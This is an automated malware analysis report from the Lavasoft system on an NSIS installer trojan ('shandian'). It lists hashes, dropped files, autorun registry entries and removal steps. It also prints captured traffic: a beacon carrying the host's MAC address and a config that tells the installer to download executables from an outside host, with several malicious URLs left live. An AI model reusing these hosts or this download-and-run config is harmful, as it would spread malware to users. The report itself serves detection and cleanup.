Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 65b966a98ffe2af8265d8c51986fb1c4
SHA1: 5a4eedaafd7e208ee7223a0fd657e9e53b255d95
SHA256: 2da986882887922b9e6666ad6b31e1408133d24cecbd2eff7ad129d32348cbed
SSDeep: 3072:tgXdZt9P6D3XJwFuPXwm9UpdfVlAqQjpt8udlfzt1sy2jVfXI:te34i2bUnTAqQjpt8GhSysQ
Size: 123703 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Applications Install
Created at: 2009-06-07 00:41:59
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:1256
File activity
The process %original file name%.exe:1256 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Éõçä¯ÀÀÆ÷\Éõçä¯ÀÀÆ÷.lnk (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Éõçä¯ÀÀÆ÷\öÃâ€ÂØ Éõçä¯ÀÀÆ÷.lnk (675 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (669 bytes)
%Program Files%\shandian\Unins.exe (564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (18246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\Éõçä¯ÀÀÆ÷.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\emaaif_70690.exe (13344 bytes)
%Program Files%\shandian\config.ini (194 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (0 bytes)
Registry activity
The process %original file name%.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Éõçä¯ÀÀÆ÷]
"DisplayName" = "Éõçä¯ÀÀÆ÷ 1.1.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Éõçä¯ÀÀÆ÷]
"Publisher" = "ð汸ÓÃ.nsi_nsis-2.45_76861_776315"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Éõçä¯ÀÀÆ÷]
"DisplayIcon" = "%Program Files%\shandian\Unins.exe"
"UninstallString" = "%Program Files%\shandian\Unins.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Éõçä¯ÀÀÆ÷]
"DisplayVersion" = "1.1.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 A9 7F 4A C8 17 A2 04 FB 3B 70 76 57 1B 01 D3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"
Dropped PE files
MD5 | File path |
---|---|
a7d710e78711d5ab90e4792763241754 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\Md5dll.dll |
254f13dfd61c5b7d2119eb2550491e1d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\NSISdl.dll |
00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\System.dll |
3a5ed71aa9c6846d95d57235c4c443d7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\xID.dll |
a2820daae8e3494f47b72e0e7db4858f | c:\Program Files\shandian\Unins.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Éõçä¯ÀÀÆ÷\Éõçä¯ÀÀÆ÷.lnk (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Éõçä¯ÀÀÆ÷\öÃâ€ÂØ Éõçä¯ÀÀÆ÷.lnk (675 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (669 bytes)
%Program Files%\shandian\Unins.exe (564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (18246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\Éõçä¯ÀÀÆ÷.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\emaaif_70690.exe (13344 bytes)
%Program Files%\shandian\config.ini (194 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: MeinV
Product Name: ?????
Product Version: 1.1.0.0
Legal Copyright: Corporation. All rights reserved.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description: Installer Application
Comments: http://www.sd.com
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 57344 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 249856 | 53152 | 53248 | 5.05621 | 28649a2ec7752389a3f79b519752e666 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://stat.huashui.org/stat/?v=1&ac=setup2&name=%original file name%.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7 | 112.124.102.171 |
down.icudi.org | 222.186.60.2 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /stat/?v=1&ac=setup2&name=%original file name%.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7 HTTP/1.0
Host: stat.huashui.org
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Connection: close
Date: Sat, 31 May 2014 09:26:17 GMT
Server: Microsoft-IIS/6.0
Who: ShanIE
Content-Length: 3176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACSSDCBR=GCKPEGAAOMNIKEFIIDMEJIKO; path=/
Cache-control: private
[s]
s=0
[Page1_1]
Task=down
Desc=........
Hint=........
Exe=F30241_s_0523.exe
URL=hXXp://down.icudi.org:99/F30241_s_0523.rar
reg=HKLM\SOFTWARE\Baidu\BaiduSd\InstallDir
[Page1_2]
Task=down
Desc=........
Hint=........
Exe=emaaif_70690.exe
URL=hXXp://down.icudi.org:99/emaaif_70690.rar
reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir
[Page1_3]
Task=down
Desc=....
Hint=....
Exe=kuping_b_54282.exe
URL=http://down.icudi.org:99/kuping_b_54282.rar
reg=HKCU\Software\Kuping\InstallPath
[Page1_4]
Task=down
Desc=........
Hint=........
Exe=pczh_98_2.exe
URL=hXXp://down.icudi.org:99/pczh_98_2.rar
reg=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Ainqngz3.9.exe\
[Page1_5]
Task=down
Desc=......
Hint=......
Exe=-8853_1_mvy.exe
URL=http://down.icudi.org:99/-8853_1_mvy.rar
reg=HKLM\SOFTWARE\Mnying\Mnyingfiledir
[Page1_6]
Task=down
Desc=...... 
Hint=......
Exe=yxku_s[106].exe
URL=hXXp://down.icudi.org:99/yxku_s[106].rar
reg=HKCU\Software\yxkuBox\InstallPath
[Page1_7]
Task=down
Desc=....
Hint=....
Exe=xkss_50041.exe
URL=hXXp://down.icudi.org:99/xkss_50041.rar
reg=HKCU\Software\xuankusoso\InstallMode
[Page1_9]
Task=down
Desc=....FM
Hint=....FM
Exe=setup_3128.exe
URL=hXXp://down.icudi.org:99/setup_3128.rar
reg=HKLM\SOFTWARE\YYMusic3\rd
[Page1_11]
Task=down
Desc=........
Hint=........
Exe=BaiduPlayerNetSetup_284.exe
URL=hXXp://down.icudi.org:99/BaiduPlayerNetSetup_284.rar
reg=HKLM\SOFTWARE\MozillaPlugins\@baidu.com/npxbdyy\Path
[Page1_12]
Task=down
Desc=.........
<<
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1256:
.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
open.ini
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
nsu2.tmp
.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7
1.1.0.0
//down.icudi.org:99/emaaif_70690.rar
%original file name%.exe
c:\%original file name%.exe
%Program Files%\shandian
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
emaaif_70690.exe
http://down.icudi.org:99/emaaif_70690.rar
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.45</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly>
%Documents and Settings%\%current user%\Desktop\
http://www.sd.com
1.1.0.0
%original file name%.exe_1256_rwx_10004000_00001000:
callback%d